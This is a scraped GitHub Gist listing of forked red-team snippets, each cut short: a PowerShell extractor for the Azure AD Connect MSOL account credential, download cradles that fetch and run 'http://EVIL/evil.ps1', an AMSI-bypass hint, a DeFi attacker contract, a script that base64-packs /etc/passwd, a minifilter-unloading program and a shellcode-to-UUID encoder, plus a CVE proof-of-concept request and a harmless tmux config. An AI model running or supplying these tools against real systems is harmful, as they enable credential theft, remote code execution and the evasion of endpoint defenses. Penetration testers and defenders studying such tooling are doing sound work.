Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
@rvrsh3ll
rvrsh3ll / azuread_decrypt_msol_v2.ps1
Created Dec 17, 2021 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
View azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
View Invoke-RestMethod with cookie and header.ps1
@rvrsh3ll
rvrsh3ll / SANSReflection.txt
Created Oct 23, 2021 — forked from jfmaes/SANSReflection.txt
Register for the SEC699 ;-)
View SANSReflection.txt
Hi SANS Workshop Attendees! Reflection is super fun!
amsi.dll
AmsiScanBuffer
uFcAB4DD
View AttackContract.sol
pragma solidity ^0.6.0;
import "./TrusterLenderPool.sol";
contract AttackerContract{
uint256 public totalTokens = 1000000 ether;
address public attackerAddress;
// DamnValuableToken public dvTokenContract;
address public dvTokenContract;
TrusterLenderPool public poolContract;
@rvrsh3ll
rvrsh3ll / read-file-gzip-base64.ps1
Created Aug 6, 2021 — forked from FrankSpierings/read-file-gzip-base64.ps1
Read file, gzip and convert to base64.
View read-file-gzip-base64.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
@rvrsh3ll
rvrsh3ll / Unload_Minifilter.c
Created May 29, 2021 — forked from OsandaMalith/Unload_Minifilter.c
Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter. It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
View Unload_Minifilter.c
#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter.
View PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
@rvrsh3ll
rvrsh3ll / tmux.conf
Created Feb 18, 2021 — forked from swtornio/tmux.conf
tmux config
View tmux.conf
#############################################
## DEFAULT GENERAL SETTINGS (tmux show -g) ##
#############################################
set-option -g activity-action other
set-option -g assume-paste-time 1
set-option -g base-index 0
set-option -g bell-action any
set-option -g default-command ""
set-option -g default-shell "/bin/bash"
@rvrsh3ll
rvrsh3ll / binToUUIDs.py
Created Feb 2, 2021 — forked from ajpc500/binToUUIDs.py
Convert shellcode file to UUIDs
View binToUUIDs.py
from uuid import UUID
import os
import sys
# Usage: python3 binToUUIDs.py shellcode.bin [--print]
print("""
____ _ _______ _ _ _ _ _____ _____
| _ \(_) |__ __| | | | | | | |_ _| __ \
| |_) |_ _ __ | | ___ | | | | | | | | | | | | |___